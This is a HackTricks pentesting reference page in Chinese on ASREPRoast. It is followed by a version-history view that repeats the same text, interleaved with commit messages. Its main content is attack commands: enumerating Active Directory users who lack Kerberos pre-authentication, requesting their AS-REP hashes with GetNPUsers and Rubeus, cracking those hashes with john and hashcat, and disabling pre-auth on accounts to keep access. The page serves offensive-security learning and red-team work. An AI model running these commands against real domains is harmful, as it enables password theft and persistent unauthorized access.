hacktricks/windows-hardening/active-directory-methodology/asreproast.md

# ASREPRoast

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

其他支持HackTricks的方式：

- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>

<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器，与经验丰富的黑客和赏金猎人交流！

**黑客见解**\
参与深入探讨黑客的刺激和挑战的内容

**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界

**最新公告**\
随时了解最新的赏金计划发布和重要平台更新

**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，立即与顶尖黑客合作！

## ASREPRoast

ASREPRoast是一种安全攻击，利用缺乏**Kerberos预身份验证所需属性**的用户。基本上，这种漏洞允许攻击者向域控制器（DC）请求用户的身份验证，而无需用户的密码。然后，DC会用用户的密码派生密钥加密消息进行响应，攻击者可以尝试脱机破解以发现用户的密码。

这种攻击的主要要求包括：
- **缺乏Kerberos预身份验证**：目标用户必须未启用此安全功能。
- **连接到域控制器（DC）**：攻击者需要访问DC以发送请求和接收加密消息。
- **可选的域帐户**：拥有域帐户可以让攻击者通过LDAP查询更有效地识别易受攻击的用户。如果没有这样的帐户，攻击者必须猜测用户名。


#### 枚举易受攻击用户（需要域凭据）

{% code title="使用Windows" %}
```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
```
{% endcode %}

{% code title="使用Linux" %}
```bash
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
```
#### 请求 AS_REP 消息

{% code title="使用 Linux" %}
```bash
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
```
{% endcode %}

{% code title="使用Windows" %}
```bash
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}

{% hint style="warning" %}
使用Rubeus进行AS-REP Roasting将生成一个加密类型为0x17且预身份验证类型为0的4768。
{% endhint %}

### 破解
```bash
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
```
### 持久性

对于具有**GenericAll**权限（或写入属性权限）的用户，强制**preauth**不是必需的：

{% code title="使用Windows" %}
```bash
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```
{% endcode %}

{% code title="使用Linux" %}
```bash
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
```
{% endcode %}

## 参考资料

* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)

***

<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器，与经验丰富的黑客和赏金猎人交流！

**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容

**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界

**最新公告**\
随时了解最新的赏金任务发布和重要平台更新

**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作！


<details>

<summary><strong>从零开始成为AWS黑客大师，学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

支持HackTricks的其他方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>
-												GitBook: [#3195] No subject

											
										
										
											2022-05-08 23:13:03 +00:00
+								# ASREPRoast
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								其他支持HackTricks的方式：
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
 								- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)
 								- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
 								- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												GITBOOK-4021: change request with no subject merged in GitBook

											
										
										
											2023-07-31 15:59:11 +00:00
+								<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
-												new link

											
										
										
											2022-11-05 09:07:43 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器，与经验丰富的黑客和赏金猎人交流！
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								**黑客见解**\
 								参与深入探讨黑客的刺激和挑战的内容
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
+								**实时黑客新闻**\
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								通过实时新闻和见解及时了解快节奏的黑客世界
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
+								**最新公告**\
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								随时了解最新的赏金计划发布和重要平台更新
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，立即与顶尖黑客合作！
-												new link

											
										
										
											2022-11-05 09:07:43 +00:00
-												GITBOOK-3816: No subject

											
										
										
											2023-03-05 19:54:13 +00:00
+								## ASREPRoast
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								ASREPRoast是一种安全攻击，利用缺乏**Kerberos预身份验证所需属性**的用户。基本上，这种漏洞允许攻击者向域控制器（DC）请求用户的身份验证，而无需用户的密码。然后，DC会用用户的密码派生密钥加密消息进行响应，攻击者可以尝试脱机破解以发现用户的密码。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								这种攻击的主要要求包括：
 								- **缺乏Kerberos预身份验证**：目标用户必须未启用此安全功能。
 								- **连接到域控制器（DC）**：攻击者需要访问DC以发送请求和接收加密消息。
 								- **可选的域帐户**：拥有域帐户可以让攻击者通过LDAP查询更有效地识别易受攻击的用户。如果没有这样的帐户，攻击者必须猜测用户名。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								#### 枚举易受攻击用户（需要域凭据）
-												Translated ['windows-hardening/active-directory-methodology/asreproast.m

											
										
										
											2024-02-02 12:08:44 +00:00
 								{% code title="使用Windows" %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
 								```
-												Translated ['windows-hardening/active-directory-methodology/asreproast.m

											
										
										
											2024-02-02 12:08:44 +00:00
+								{% endcode %}
 								{% code title="使用Linux" %}
 								```bash
 								bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
 								```
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								#### 请求 AS_REP 消息
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
+								{% code title="使用 Linux" %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#Try all the usernames in usernames.txt
 								python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
 								#Use domain creds to extract targets and target them
 								python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
 								```
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
+								{% endcode %}
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								{% code title="使用Windows" %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
 								```
 								{% endcode %}
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								{% hint style="warning" %}
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								使用Rubeus进行AS-REP Roasting将生成一个加密类型为0x17且预身份验证类型为0的4768。
-												GitBook: [#3389] No subject

											
										
										
											2022-08-15 13:00:19 +00:00
+								{% endhint %}
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 破解
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								```bash
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								john --wordlist=passwords_kerb.txt hashes.asreproast
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								### 持久性
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								对于具有**GenericAll**权限（或写入属性权限）的用户，强制**preauth**不是必需的：
-												Translated ['windows-hardening/active-directory-methodology/asreproast.m

											
										
										
											2024-02-02 12:08:44 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								{% code title="使用Windows" %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
 								```
-												Translated ['windows-hardening/active-directory-methodology/asreproast.m

											
										
										
											2024-02-02 12:08:44 +00:00
+								{% endcode %}
 								{% code title="使用Linux" %}
 								```bash
 								bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
 								```
-												Translated ['generic-methodologies-and-resources/pentesting-wifi/README.

											
										
										
											2024-02-02 13:13:21 +00:00
+								{% endcode %}
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 参考资料
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
 								***
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												GITBOOK-4021: change request with no subject merged in GitBook

											
										
										
											2023-07-31 15:59:11 +00:00
+								<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器，与经验丰富的黑客和赏金猎人交流！
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								**黑客见解**\
 								参与深入探讨黑客行为的刺激和挑战的内容
-												GITBOOK-3816: No subject

											
										
										
											2023-03-05 19:54:13 +00:00
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
+								**实时黑客新闻**\
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								通过实时新闻和见解及时了解快节奏的黑客世界
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
+								**最新公告**\
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								随时了解最新的赏金任务发布和重要平台更新
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['mobile-pentesting/android-app-pentesting/README.md', 'mobil

											
										
										
											2024-02-08 04:42:06 +00:00
+								**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作！
-												new link

											
										
										
											2022-11-05 09:07:43 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								<summary><strong>从零开始成为AWS黑客大师，学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								支持HackTricks的其他方式：
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:09:47 +00:00
+								* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
 								* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
 								* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>